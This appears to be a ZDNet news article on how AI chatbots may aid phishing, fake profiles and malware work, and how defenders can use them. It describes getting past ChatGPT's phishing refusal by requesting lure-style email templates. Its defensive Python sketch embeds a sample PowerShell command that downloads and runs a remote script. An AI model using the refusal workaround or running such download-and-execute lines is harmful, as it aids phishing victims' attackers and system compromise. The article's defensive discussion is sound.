What AI chatbots mean for the future of cybersecurity


From relatively simple tasks, like writing emails, to more complex jobs, like drafting long texts or writing computer code, OpenAI’s ChatGPT chatbot has garnered a lot of interest ever since its launch. It is far from perfect, of course: it has been known to make mistakes by misinterpreting the information it has learned. But many see it, and other AI tools, as the future of the internet.

OpenAI’s Terms of Service for ChatGPT specifically prohibit the generation of malware, including ransomware, keyloggers, viruses, or “any other software intended to cause some harm.” They also prohibit attempts to create spam, as well as use cases aimed at cybercrime. But as with any innovative online technology, there are already people experimenting with ways to exploit ChatGPT for darker purposes.

Make their operations more profitable

Indeed, it did not take long after its launch for cybercriminals to start posting in underground forums about how ChatGPT could be used to facilitate criminal activity, such as writing phishing emails or helping to write malware.

There are already fears that scammers are trying to use ChatGPT and other AI tools, such as Google Bard. While these AI tools won’t revolutionize cyberattacks, they could help cybercriminals run malicious campaigns more efficiently.

“I don’t think, at least in the short term, that ChatGPT will create new types of attacks. The goal will be to make their day-to-day operations more profitable,” says Sergey Shykevich, threat intelligence group manager at Check Point.

More convincing phishing

Phishing is the most common component of hacking and fraud campaigns, and email is a key tool in these operations, whether attackers use it to distribute malware, send phishing links or convince a victim to transfer money.

This reliance on email means cybercriminals need a constant stream of clear and usable content. Fortunately, many of these phishing attempts are easy to spot as spam these days. But an effective automated text generator could make those emails far more convincing.

And while cybercrime is global, language can be a barrier, especially for the most targeted phishing campaigns, which rely on impersonating a trusted contact. It’s unlikely someone will believe they’re talking to a co-worker if the emails are full of spelling mistakes, grammatical errors or odd punctuation.

Call centers

But if the AI is harnessed correctly, a chatbot could be used to compose the text of emails in the language desired by the attacker. “The big hurdle for Russian cybercriminals is the language – English,” says Shykevich. “They are now hiring English graduates from Russian universities to write phishing emails and to work in call centers – and they have to pay for it.”

He continues, “A tool like ChatGPT can save them a lot of money on creating a variety of phishing messages. I think that’s what they’ll be looking to do.” In theory, protections have been put in place to prevent abuse. For example, ChatGPT requires users to register an email address and phone number to verify registration.

But although the chatbot refuses to write phishing emails outright, it can be asked to create email templates for other messages that are commonly exploited by cyber attackers. These could include messages announcing an annual bonus, asking that an important software update be downloaded and installed, or insisting that an attached document be reviewed urgently.

“It’s possible to create a beautifully worded and grammatically correct invitation, which you wouldn’t necessarily be able to do if you weren’t a native English speaker,” says Adam Meyers, senior vice president of intelligence at Crowdstrike, a provider of cybersecurity and threat intelligence services.

Fake profiles

But the misuse of these tools is not limited to email. Criminals could use them to write content for any text-based online platform. For attackers running scams, or even high-profile hacking groups trying to run espionage campaigns, such tools could prove useful, especially for creating fake social media profiles to lure people in.

“If you want to generate a plausible business discussion on LinkedIn to give the impression that you are a real businessman trying to make contacts, ChatGPT is ideal for that,” says Kelly Shortridge, cybersecurity expert and principal product technologist at Fastly, a cloud computing provider.

Various hacking groups attempt to exploit LinkedIn and other social media platforms to conduct cyber espionage campaigns. But creating fake, legitimate-looking online profiles, and filling them with posts, is a time-consuming process. Shortridge thinks attackers could use AI tools like ChatGPT to write convincing content, with the added benefit of being far less labor-intensive than doing the work by hand.

“A lot of social engineering campaigns like this take a lot of effort because you have to set up these profiles,” she explains, believing that AI tools could significantly lower the barrier to entry. “I’m sure ChatGPT could craft some very compelling thought leadership messages,” she says.

No way to completely eliminate abuse

The nature of technological innovation means that whenever something new appears, there will always be people trying to exploit it for malicious purposes. And even with the most innovative ways to try to prevent abuse, the devious nature of cybercriminals and fraudsters means they’ll likely find ways to circumvent protections.

“There is no way to completely eliminate abuse. This has never happened with any system,” says Shykevich, who hopes that highlighting potential cybersecurity issues will lead to more debate on how to prevent AI chatbots from being exploited for malicious purposes.

“It’s great technology, but, as always with new technology, there are risks, and it’s important to discuss them so people are aware of them. And I think the more we talk about it, the more likely it is that OpenAI and similar companies will invest more in reducing abuse,” he suggests.

Interest in cybersecurity

AI chatbots such as ChatGPT are also of interest to cybersecurity defenders. They are particularly good at parsing and understanding code, so they can be used to help defenders understand malware. And since they can also write code, these tools could help developers produce better, safer code faster.
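As a rough illustration of that defensive use, the short Python sketch below sends a suspicious script to a chat model and asks for a plain-language explanation of what it does. It is only a sketch: it assumes the OpenAI Python SDK is installed and an API key is set in the environment, and the model name, prompt and sample snippet are purely illustrative.

```python
# Minimal sketch: ask a chat model to explain a suspicious script (illustrative only).
# Assumes the OpenAI Python SDK is installed and OPENAI_API_KEY is set in the environment.
from openai import OpenAI

client = OpenAI()  # picks up OPENAI_API_KEY automatically

# Hypothetical, defanged snippet of the kind pulled from a phishing attachment.
suspicious_script = r"""
$u = 'hxxp://example[.]com/update.ps1'
Invoke-WebRequest -Uri $u -OutFile "$env:TEMP\update.ps1"
Start-Process powershell -ArgumentList "-ExecutionPolicy Bypass -File $env:TEMP\update.ps1"
"""

response = client.chat.completions.create(
    model="gpt-4o-mini",  # illustrative model name
    messages=[
        {
            "role": "system",
            "content": (
                "You are assisting a malware analyst. Explain, step by step, "
                "what the following script does. Do not execute anything."
            ),
        },
        {"role": "user", "content": suspicious_script},
    ],
)

print(response.choices[0].message.content)
```

The same pattern could just as easily be pointed at an incident log or a decompiled function; the value for defenders lies in a fast first-pass explanation that an analyst then verifies, not a definitive verdict.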

As Forrester principal analyst Jeff Pollard recently wrote, ChatGPT could significantly reduce the time it takes to report security incidents. “Processing these reports more quickly frees up more time for other tasks – testing, assessment, investigation and response – which helps security teams adapt,” he notes, adding that a bot could suggest recommended next actions based on available data.

“If security orchestration, automation and response (SOAR) tools are properly configured to speed up artifact retrieval, this could accelerate detection and response and help security operations center analysts make better decisions.” Chatbots could therefore make life more difficult for some in cybersecurity, but there could also be upsides.

ZDNet.com contacted OpenAI for comment but did not receive a response. However, ZDNet.com asked ChatGPT itself what rules it has in place to prevent it from being used for phishing, and received the following response.

“It is important to note that while AI language models like ChatGPT can generate texts similar to phishing emails, they cannot perform malicious actions on their own. It is therefore important that users exercise caution and good judgment when using AI technology, and be vigilant to protect against phishing and other malicious activity.”


Source: “ZDNet.com”





